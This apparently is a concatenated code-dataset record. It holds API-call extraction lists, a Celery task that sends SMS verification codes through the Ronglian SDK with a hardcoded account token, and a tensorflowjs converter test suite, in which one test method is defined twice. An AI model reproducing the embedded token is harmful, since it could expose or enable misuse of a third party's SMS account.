[((9394, 9425), 'gym.make', 'gym.make', (['"""RoboschoolHopper-v1"""'], {}), "('RoboschoolHopper-v1')\n", (9402, 9425), False, 'import gym, roboschool\n'), ((9625, 9659), 'os.makedirs', 'os.makedirs', (['outdir'], {'exist_ok': '(True)'}), '(outdir, exist_ok=True)\n', (9636, 9659), False, 'import os\n'), ((1671, 1691), 'numpy.array', 'np.array', (['fromto[:3]'], {}), '(fromto[:3])\n', (1679, 1691), True, 'import numpy as np\n'), ((1710, 1730), 'numpy.array', 'np.array', (['fromto[3:]'], {}), '(fromto[3:])\n', (1718, 1730), True, 'import numpy as np\n'), ((7208, 7232), 'xml.etree.ElementTree.parse', 'ET.parse', (['self.model_xml'], {}), '(self.model_xml)\n', (7216, 7232), True, 'import xml.etree.ElementTree as ET\n'), ((1756, 1788), 'numpy.sum', 'np.sum', (['((self.p2 - self.p1) ** 2)'], {}), '((self.p2 - self.p1) ** 2)\n', (1762, 1788), True, 'import numpy as np\n'), ((9977, 10009), 'os.path.join', 'os.path.join', (['outdir', '"""%05d.png"""'], {}), "(outdir, '%05d.png')\n", (9989, 10009), False, 'import os\n'), ((10056, 10087), 'os.path.join', 'os.path.join', (['outdir', '"""out.mp4"""'], {}), "(outdir, 'out.mp4')\n", (10068, 10087), False, 'import os\n'), ((6973, 6991), 'numpy.array', 'np.array', (['(v1, v2)'], {}), '((v1, v2))\n', (6981, 6991), True, 'import numpy as np\n'), ((2228, 2262), 'numpy.concatenate', 'np.concatenate', (['[self.p1, self.p2]'], {}), '([self.p1, self.p2])\n', (2242, 2262), True, 'import numpy as np\n')]
from ronglian_sms_sdk import SmsSDK from celery_tasks.main import app # 写我们的任务(函数) # 任务必须要celery的实例对象装饰器task装饰 # 任务包的任务需要celery调用自检检查函数。(在main里面写。) @app.task def celery_send_sms_code(mobile, sms_code): accId = '<KEY>' accToken = '514a8783b8c2481ebbeb6a814434796f' appId = '<KEY>' # 9.1. 创建荣联云 实例对象 sdk = SmsSDK(accId, accToken, appId) tid = '1' # 我们发送短信的模板,值 只能是 1 因为我们是测试用户 mobile = '%s' % mobile # '手机号1,手机号2' 给哪些手机号发送验证码,只能是测试手机号 datas = (sms_code, 10) # ('变量1', '变量2') 涉及到模板的变量 # 您的验证码为{1},请于{2} 分钟内输入 # 您的验证码为666999,请于5 分钟内输入 # 9.2. 发送短信 sdk.sendMessage(tid, mobile, datas)
[ "ronglian_sms_sdk.SmsSDK" ]
[((326, 356), 'ronglian_sms_sdk.SmsSDK', 'SmsSDK', (['accId', 'accToken', 'appId'], {}), '(accId, accToken, appId)\n', (332, 356), False, 'from ronglian_sms_sdk import SmsSDK\n')]
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Test the Python API and shell binary of the tensorflowjs pip package.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import glob import json import os import shutil import subprocess import sys import tempfile import unittest import numpy as np import tensorflow as tf from tensorflow import keras from tensorflow.python.eager import def_function from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import tensor_spec from tensorflow.python.ops import variables from tensorflow.python.training.tracking import tracking from tensorflow.python.saved_model.save import save import tensorflow_hub as hub import tensorflowjs as tfjs def _createKerasModel(layer_name_prefix, h5_path=None): """Create a Keras model for testing. Args: layer_name_prefix: A prefix string for layer names. This helps avoid clashes in layer names between different test methods. h5_path: Optional string path for a HDF5 (.h5) file to save the model in. Returns: An instance of keras.Model. """ input_tensor = keras.layers.Input((3, )) dense1 = keras.layers.Dense( 4, use_bias=True, kernel_initializer='ones', bias_initializer='zeros', name=layer_name_prefix + '1')(input_tensor) output = keras.layers.Dense( 2, use_bias=False, kernel_initializer='ones', name=layer_name_prefix + '2')(dense1) model = keras.models.Model(inputs=[input_tensor], outputs=[output]) if h5_path: model.save(h5_path) return model def _createTensorFlowSavedModelV1(name_scope, save_path): """Create a TensorFlow SavedModel for testing. Args: name_scope: Name scope to create the model under. This helps avoid op and variable name clashes between different test methods. save_path: The directory path in which to save the model. """ graph = tf.Graph() with graph.as_default(): with tf.compat.v1.name_scope(name_scope): x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]]) w = tf.compat.v1.get_variable('w', shape=[2, 2]) y = tf.compat.v1.matmul(x, w) output = tf.compat.v1.nn.softmax(y) init_op = w.initializer # Create a builder. builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_path) with tf.compat.v1.Session() as sess: # Run the initializer on `w`. sess.run(init_op) builder.add_meta_graph_and_variables( sess, [tf.compat.v1.saved_model.tag_constants.SERVING], signature_def_map={ "serving_default": tf.compat.v1.saved_model.signature_def_utils.predict_signature_def( inputs={"x": x}, outputs={"output": output}) }, assets_collection=None) builder.save() def _createTensorFlowSavedModel(name_scope, save_path): """Create a TensorFlow SavedModel for testing. Args: name_scope: Name scope to create the model under. This helps avoid op and variable name clashes between different test methods. save_path: The directory path in which to save the model. """ input_data = constant_op.constant(1., shape=[1]) root = tracking.AutoTrackable() root.v1 = variables.Variable(3.) root.v2 = variables.Variable(2.) root.f = def_function.function(lambda x: root.v1 * root.v2 * x) to_save = root.f.get_concrete_function(input_data) save(root, save_path, to_save) def _create_hub_module(save_path): """Create a TensorFlow Hub module for testing. Args: save_path: The directory path in which to save the model. """ # Module function that doubles its input. def double_module_fn(): w = tf.Variable([2.0, 4.0]) x = tf.compat.v1.placeholder(dtype=tf.float32) hub.add_signature(inputs=x, outputs=x*w) graph = tf.Graph() with graph.as_default(): spec = hub.create_module_spec(double_module_fn) m = hub.Module(spec) # Export the module. with tf.compat.v1.Session(graph=graph) as sess: sess.run(tf.compat.v1.global_variables_initializer()) m.export(save_path, sess) class APIAndShellTest(tf.test.TestCase): """Tests for the Python API of the pip package.""" @classmethod def setUpClass(cls): cls.class_tmp_dir = tempfile.mkdtemp() cls.tf_saved_model_dir = os.path.join(cls.class_tmp_dir, 'tf_saved_model') cls.tf_saved_model_v1_dir = os.path.join( cls.class_tmp_dir, 'tf_saved_model_v1') _createTensorFlowSavedModel('a', cls.tf_saved_model_dir) _createTensorFlowSavedModelV1('b', cls.tf_saved_model_v1_dir) cls.tf_hub_module_dir = os.path.join(cls.class_tmp_dir, 'tf_hub_module') _create_hub_module(cls.tf_hub_module_dir) @classmethod def tearDownClass(cls): shutil.rmtree(cls.class_tmp_dir) def setUp(self): # Make sure this file is not being run from the source directory, to # avoid picking up source files. if os.path.isdir( os.path.join(os.path.dirname(__file__), 'tensorflowjs')): self.fail('Do not run this test from the Python source directory. ' 'This file is intended to be run on pip install.') self._tmp_dir = tempfile.mkdtemp() super(APIAndShellTest, self).setUp() def tearDown(self): if os.path.isdir(self._tmp_dir): shutil.rmtree(self._tmp_dir) super(APIAndShellTest, self).tearDown() def testVersionString(self): self.assertEqual(2, tfjs.__version__.count('.')) def testSaveKerasModel(self): with self.test_session(): # First create a toy keras model. model = _createKerasModel('MergedDense') tfjs.converters.save_keras_model(model, self._tmp_dir) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json')) as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDense1/kernel', 'MergedDense1/bias', 'MergedDense2/kernel' ])) self.assertEqual(weight_shapes['MergedDense1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDense1/bias'], [4]) self.assertEqual(weight_shapes['MergedDense2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDense1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDense1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDense2/kernel'], 'float32') def testLoadKerasModel(self): # Use separate tf.Graph and tf.compat.v1.Session contexts to prevent name collision. with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. model1 = _createKerasModel('MergedDense') tfjs.converters.save_keras_model(model1, self._tmp_dir) model1_weight_values = model1.get_weights() with tf.Graph().as_default(), tf.compat.v1.Session(): # Load the model from saved artifacts. model2 = tfjs.converters.load_keras_model( os.path.join(self._tmp_dir, 'model.json')) # Compare the loaded model with the original one. model2_weight_values = model2.get_weights() self.assertEqual(len(model1_weight_values), len(model2_weight_values)) for model1_weight_value, model2_weight_value in zip( model1_weight_values, model2_weight_values): self.assertAllClose(model1_weight_value, model2_weight_value) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(self._tmp_dir, 'group*-*'))) def testInvalidInputFormatRaisesError(self): process = subprocess.Popen( [ 'tensorflowjs_converter', '--input_format', 'nonsensical_format', self._tmp_dir, self._tmp_dir ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn(b'--input_format', tf.compat.as_bytes(stderr)) def testMissingInputPathRaisesError(self): process = subprocess.Popen( [ 'tensorflowjs_converter' ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn(b'input_path', tf.compat.as_bytes(stderr)) def testKerasH5ConversionWorksFromCLI(self): with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') _createKerasModel('MergedDenseForCLI', h5_path) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias', 'MergedDenseForCLI2/kernel' ])) self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4]) self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32') # Verify that there is only one weight group due to the default # non-split_weights_by_layer behavior. The model is a small one, which # does not exceed the 4-MB shard size limit. Therefore, there should # be only one weight file. self.assertEqual( 1, len(glob.glob(os.path.join(self._tmp_dir, 'group*')))) def testKerasH5ConversionSplitWeightsByLayerWorksFromCLI(self): with tf.Graph().as_default(), tf.compat.v1.Session(): # First create a toy keras model. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') _createKerasModel('MergedDenseForCLI', h5_path) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', '--split_weights_by_layer', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # Briefly check the model topology. with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f: json_content = json.load(f) model_json = json_content['modelTopology'] self.assertIsInstance(model_json['model_config'], dict) self.assertIsInstance(model_json['model_config']['config'], dict) self.assertIn('layers', model_json['model_config']['config']) weights_manifest = json_content['weightsManifest'] self.assertIsInstance(weights_manifest, list) # Briefly check the weights manifest. weight_shapes = dict() weight_dtypes = dict() for manifest_item in weights_manifest: for weight in manifest_item['weights']: weight_name = weight['name'] weight_shapes[weight_name] = weight['shape'] weight_dtypes[weight_name] = weight['dtype'] self.assertEqual( sorted(list(weight_shapes.keys())), sorted([ 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias', 'MergedDenseForCLI2/kernel' ])) self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4]) self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4]) self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2]) self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32') self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32') # Verify that there are two weight groups due to the optional flag # --split_weights_by_layer behavior. The model is a small one. None of # the layers should have weight sizes exceeding the 4-MB shard size # limit. self.assertEqual( 2, len(glob.glob(os.path.join(self._tmp_dir, 'group*')))) def testKerasH5ConversionWithSignatureNameErrors(self): process = subprocess.Popen( [ 'tensorflowjs_converter', '--input_format', 'keras', '--signature_name', 'bar', os.path.join(self._tmp_dir, 'foo.h5'), os.path.join(self._tmp_dir, 'output') ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertGreater(process.returncode, 0) self.assertIn( b'The --signature_name flag is applicable only to', tf.compat.as_bytes(stderr)) def testConvertTFSavedModelV1WithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]}]}] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) self.assertEqual(output_json['weightsManifest'], weights) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTFHubModuleWithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_hub', self.tf_hub_module_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{ 'shape': [2], 'name': 'module/Variable', 'dtype': 'float32' }] }] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) self.assertEqual(output_json['weightsManifest'], weights) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTFSavedModelWithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{ 'dtype': 'float32', 'shape': [], 'name': 'StatefulPartitionedCall/mul' }] }] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) weights_manifest = output_json['weightsManifest'] self.assertEqual(len(weights_manifest), len(weights)) if sys.version_info[0] < 3: self.assertItemsEqual(weights_manifest[0]['paths'], weights[0]['paths']) self.assertItemsEqual(weights_manifest[0]['weights'], weights[0]['weights']) else: self.assertCountEqual(weights_manifest[0]['paths'], weights[0]['paths']) self.assertCountEqual(weights_manifest[0]['weights'], weights[0]['weights']) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTFHubModuleWithCommandLineWorks(self): output_dir = os.path.join(self._tmp_dir) process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tf_hub', self.tf_hub_module_dir, output_dir ]) process.communicate() self.assertEqual(0, process.returncode) weights = [{ 'paths': ['group1-shard1of1.bin'], 'weights': [{ 'shape': [2], 'name': 'module/Variable', 'dtype': 'float32' }] }] # Load the saved weights as a JSON string. output_json = json.load( open(os.path.join(output_dir, 'model.json'), 'rt')) self.assertEqual(output_json['weightsManifest'], weights) # Check the content of the output directory. self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*'))) def testConvertTensorflowjsArtifactsToKerasH5(self): # 1. Create a toy keras model and save it as an HDF5 file. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') with tf.Graph().as_default(), tf.compat.v1.Session(): model = _createKerasModel('MergedDenseForCLI', h5_path) model_json = model.to_json() # 2. Convert the HDF5 file to tensorflowjs format. process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 3. Convert the tensorflowjs artifacts back to HDF5. new_h5_path = os.path.join(self._tmp_dir, 'model_2.h5') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'keras', os.path.join(self._tmp_dir, 'model.json'), new_h5_path]) process.communicate() self.assertEqual(0, process.returncode) # 4. Load the model back from the new HDF5 file and compare with the # original model. with tf.Graph().as_default(), tf.compat.v1.Session(): model_2 = keras.models.load_model(new_h5_path) model_2_json = model_2.to_json() self.assertEqual(model_json, model_2_json) def testLoadTensorflowjsArtifactsAsKerasModel(self): # 1. Create a toy keras model and save it as an HDF5 file. os.makedirs(os.path.join(self._tmp_dir, 'keras_h5')) h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5') with tf.Graph().as_default(), tf.compat.v1.Session(): model = _createKerasModel('MergedDenseForCLI', h5_path) model_json = model.to_json() # 2. Convert the HDF5 file to tensorflowjs format. process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 3. Load the tensorflowjs artifacts as a keras.Model instance. with tf.Graph().as_default(), tf.compat.v1.Session(): model_2 = tfjs.converters.load_keras_model( os.path.join(self._tmp_dir, 'model.json')) model_2_json = model_2.to_json() self.assertEqual(model_json, model_2_json) def testVersion(self): process = subprocess.Popen( ['tensorflowjs_converter', '--version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, _ = process.communicate() self.assertEqual(0, process.returncode) self.assertIn( tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__), tf.compat.as_bytes(stdout)) process = subprocess.Popen( ['tensorflowjs_converter', '-v'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, _ = process.communicate() self.assertEqual(0, process.returncode) self.assertIn( tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__), tf.compat.as_bytes(stdout)) class ConvertTfKerasSavedModelTest(tf.test.TestCase): def setUp(self): super(ConvertTfKerasSavedModelTest, self).setUp() self._tmp_dir = tempfile.mkdtemp() def tearDown(self): if os.path.isdir(self._tmp_dir): shutil.rmtree(self._tmp_dir) super(ConvertTfKerasSavedModelTest, self).tearDown() def _createSimpleSequentialModel(self): model = keras.Sequential() model.add(keras.layers.Reshape([2, 3], input_shape=[6])) model.add(keras.layers.LSTM(10)) model.add(keras.layers.Dense(1, activation='sigmoid')) return model def _createNestedSequentialModel(self): model = keras.Sequential() model.add(keras.layers.Dense(6, input_shape=[10], activation='relu')) model.add(self._createSimpleSequentialModel()) return model def _createFunctionalModelWithWeights(self): input1 = keras.Input(shape=[8]) input2 = keras.Input(shape=[10]) y = keras.layers.Concatenate()([input1, input2]) y = keras.layers.Dense(4, activation='softmax')(y) model = keras.Model([input1, input2], y) return model def testConvertTfKerasNestedSequentialSavedModelIntoTfjsFormat(self): with tf.Graph().as_default(), tf.compat.v1.Session(): x = np.random.randn(8, 10) # 1. Run the model.predict(), store the result. Then saved the model # as a SavedModel. model = self._createNestedSequentialModel() y = model.predict(x) keras.experimental.export_saved_model(model, self._tmp_dir) # 2. Convert the keras saved model to tfjs format. tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs') # Implicit value of --output_format: tfjs_layers_model process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras_saved_model', self._tmp_dir, tfjs_output_dir ]) process.communicate() self.assertEqual(0, process.returncode) model_json_path = os.path.join(tfjs_output_dir, 'model.json') self.assertTrue(os.path.isfile(model_json_path)) # 3. Convert the tfjs model to keras h5 format. new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'keras', model_json_path, new_h5_path]) process.communicate() self.assertEqual(0, process.returncode) self.assertTrue(os.path.isfile(new_h5_path)) # 4. Load the model back and assert on the equality of the predict # results. model_prime = keras.models.load_model(new_h5_path) new_y = model_prime.predict(x) self.assertAllClose(y, new_y) def testConvertTfKerasFunctionalSavedModelIntoTfjsFormat(self): with tf.Graph().as_default(), tf.compat.v1.Session(): x1 = np.random.randn(4, 8) x2 = np.random.randn(4, 10) # 1. Run the model.predict(), store the result. Then saved the model # as a SavedModel. model = self._createFunctionalModelWithWeights() y = model.predict([x1, x2]) keras.experimental.export_saved_model(model, self._tmp_dir) # 2. Convert the keras saved model to tfjs format. tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs') # Use explicit --output_format value: tfjs_layers_model process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras_saved_model', '--output_format', 'tfjs_layers_model', self._tmp_dir, tfjs_output_dir ]) process.communicate() self.assertEqual(0, process.returncode) model_json_path = os.path.join(tfjs_output_dir, 'model.json') self.assertTrue(os.path.isfile(model_json_path)) # 3. Convert the tfjs model to keras h5 format. new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'keras', model_json_path, new_h5_path]) process.communicate() self.assertEqual(0, process.returncode) self.assertTrue(os.path.isfile(new_h5_path)) # 4. Load the model back and assert on the equality of the predict # results. model_prime = keras.models.load_model(new_h5_path) new_y = model_prime.predict([x1, x2]) self.assertAllClose(y, new_y) def testUsingIncorrectKerasSavedModelRaisesError(self): with tf.Graph().as_default(), tf.compat.v1.Session(): x = np.random.randn(8, 10) # 1. Run the model.predict(), store the result. Then saved the model # as a SavedModel. model = self._createNestedSequentialModel() y = model.predict(x) keras.experimental.export_saved_model(model, self._tmp_dir) # 2. Convert the keras saved model to tfjs format. tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs') # Use incorrect --input_format value: keras process = subprocess.Popen( [ 'tensorflowjs_converter', '--input_format', 'keras', self._tmp_dir, tfjs_output_dir ], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, stderr = process.communicate() self.assertIn( b'Expected path to point to an HDF5 file, ' b'but it points to a directory', tf.compat.as_bytes(stderr)) def testConvertTfjsLayersModelIntoShardedWeights(self): with tf.Graph().as_default(), tf.compat.v1.Session(): x = np.random.randn(8, 10) # 1. Run the model.predict(), store the result. Then saved the model # as a SavedModel. model = self._createNestedSequentialModel() y = model.predict(x) weights = model.get_weights() total_weight_bytes = sum(np.size(w) for w in weights) * 4 keras.experimental.export_saved_model(model, self._tmp_dir) # 2. Convert the keras saved model to tfjs_layers_model format. tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs') # Implicit value of --output_format: tfjs_layers_model process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras_saved_model', self._tmp_dir, tfjs_output_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 3. Convert the tfjs_layers_model to another tfjs_layers_model, # with sharded weights. weight_shard_size_bytes = int(total_weight_bytes * 0.3) # Due to the shard size, there ought to be 4 shards after conversion. sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'tfjs_layers_model', '--weight_shard_size_bytes', str(weight_shard_size_bytes), os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 4. Check the sharded weight files and their sizes. weight_files = sorted( glob.glob(os.path.join(sharded_model_dir, 'group*.bin'))) self.assertEqual(len(weight_files), 4) weight_file_sizes = [os.path.getsize(f) for f in weight_files] self.assertEqual(sum(weight_file_sizes), total_weight_bytes) self.assertEqual(weight_file_sizes[0], weight_file_sizes[1]) self.assertEqual(weight_file_sizes[0], weight_file_sizes[2]) self.assertLess(weight_file_sizes[3], weight_file_sizes[0]) # 5. Convert the sharded tfjs_layers_model back into a keras h5 file. new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', os.path.join(sharded_model_dir, 'model.json'), new_h5_path ]) process.communicate() self.assertEqual(0, process.returncode) with tf.Graph().as_default(), tf.compat.v1.Session(): # 6. Load the keras model and check the predict() output is close to # before. new_model = keras.models.load_model(new_h5_path) new_y = new_model.predict(x) self.assertAllClose(new_y, y) def testConvertTfjsLayersModelWithQuantization(self): with tf.Graph().as_default(), tf.compat.v1.Session(): x = np.random.randn(8, 10) # 1. Run the model.predict(), store the result. Then saved the model # as a SavedModel. model = self._createNestedSequentialModel() y = model.predict(x) weights = model.get_weights() total_weight_bytes = sum(np.size(w) for w in weights) * 4 keras.experimental.export_saved_model(model, self._tmp_dir) # 2. Convert the keras saved model to tfjs_layers_model format. tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs') # Implicit value of --output_format: tfjs_layers_model process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras_saved_model', self._tmp_dir, tfjs_output_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 3. Convert the tfjs_layers_model to another tfjs_layers_model, # with uint16 quantization. weight_shard_size_bytes = int(total_weight_bytes * 0.3) # Due to the shard size, there ought to be 4 shards after conversion. sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'tfjs_layers_model', '--quantization_bytes', '2', os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 4. Check the quantized weight file and its size. weight_files = sorted( glob.glob(os.path.join(sharded_model_dir, 'group*.bin'))) self.assertEqual(len(weight_files), 1) weight_file_size = os.path.getsize(weight_files[0]) # The size of the weight file should reflect the uint16 quantization. self.assertEqual(weight_file_size, total_weight_bytes // 2) def testConvertTfjsLayersModelToTfjsGraphModel(self): x = np.random.randn(8, 10) # 1. Create a model for testing. model = keras.Sequential() model.add(keras.layers.Dense(10, activation='relu', input_shape=[4])) model.add(keras.layers.Dense(1, activation='sigmoid')) h5_path = os.path.join(self._tmp_dir, 'model.h5') model.save(h5_path) # 2. Convert the keras saved model to tfjs_layers_model format. layers_model_output_dir = os.path.join(self._tmp_dir, 'tfjs_layers') # Implicit value of --output_format: tfjs_layers_model process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'keras', h5_path, layers_model_output_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 3. Convert the tfjs_layers_model to another tfjs_graph_model. graph_model_dir = os.path.join(self._tmp_dir, 'tfjs_graph') process = subprocess.Popen([ 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model', '--output_format', 'tfjs_graph_model', os.path.join(layers_model_output_dir, 'model.json'), graph_model_dir ]) process.communicate() self.assertEqual(0, process.returncode) # 4. Check the model.json and weight file and its size. self.assertTrue(os.path.isfile(os.path.join(graph_model_dir, 'model.json'))) weight_files = sorted( glob.glob(os.path.join(graph_model_dir, 'group*.bin'))) self.assertEqual(len(weight_files), 1) if __name__ == '__main__': tf.test.main()
[ "tensorflow.python.eager.def_function.function", "tensorflow.keras.layers.Dense", "tensorflow.keras.models.load_model", "tensorflow.keras.experimental.export_saved_model", "tensorflow.compat.as_bytes", "tensorflow.python.ops.variables.Variable", "tensorflow.compat.v1.Session", "tensorflow.compat.v1.global_variables_initializer", "tensorflow.compat.v1.placeholder", "tensorflow.keras.layers.Input", "tensorflow.Graph", "tensorflow.compat.v1.saved_model.builder.SavedModelBuilder", "tensorflow.keras.layers.Reshape", "tensorflow.keras.Sequential", "tensorflow_hub.create_module_spec", "tensorflow.python.training.tracking.tracking.AutoTrackable", "tensorflow.python.saved_model.save.save", "subprocess.Popen", "tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def", "os.path.isdir", "tensorflow.keras.models.Model", "tensorflow.compat.v1.nn.softmax", "os.path.getsize", "tensorflow_hub.Module", "tensorflow.Variable", "numpy.size", "tensorflowjs.converters.save_keras_model", "os.path.isfile", "tensorflow.keras.layers.LSTM", "os.path.dirname", "tempfile.mkdtemp", "tensorflow.compat.v1.constant", "tensorflow.keras.Input", "numpy.random.randn", "tensorflow.compat.v1.name_scope", "tensorflow.compat.v1.matmul", "tensorflow.compat.v1.get_variable", "tensorflow.keras.layers.Concatenate", "os.path.join", "tensorflow.python.framework.constant_op.constant", "tensorflowjs.__version__.count", "tensorflow.test.main", "json.load", "shutil.rmtree", "tensorflow.keras.Model", 